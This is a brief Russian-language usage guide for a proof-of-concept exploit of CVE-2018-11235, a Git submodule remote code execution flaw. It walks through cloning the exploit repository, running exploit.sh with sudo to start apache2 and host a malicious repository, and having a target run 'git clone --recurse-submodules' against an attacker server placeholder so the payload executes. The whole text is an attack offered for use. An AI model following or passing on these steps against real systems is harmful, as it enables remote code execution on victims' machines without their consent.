
эксплойт PoC для CVE-2018-11235
git clone https://github.com/Rezy-Dev/CVE-2018-11235
cd CVE-2018-11235
exploit.sh права на выполнение (x), затем запустите его:sudo chmod +x exploit.sh
sudo ./exploit.sh
Это загрузит apache2 и создаст вредоносный репозиторий для нас.
http://vps-ip/malicious.git как git-репозиторий.git clone --recurse-submodules http://vps-ip/malicious.git
Команда RCE из полезной нагрузки должна выполниться.
Спасибо!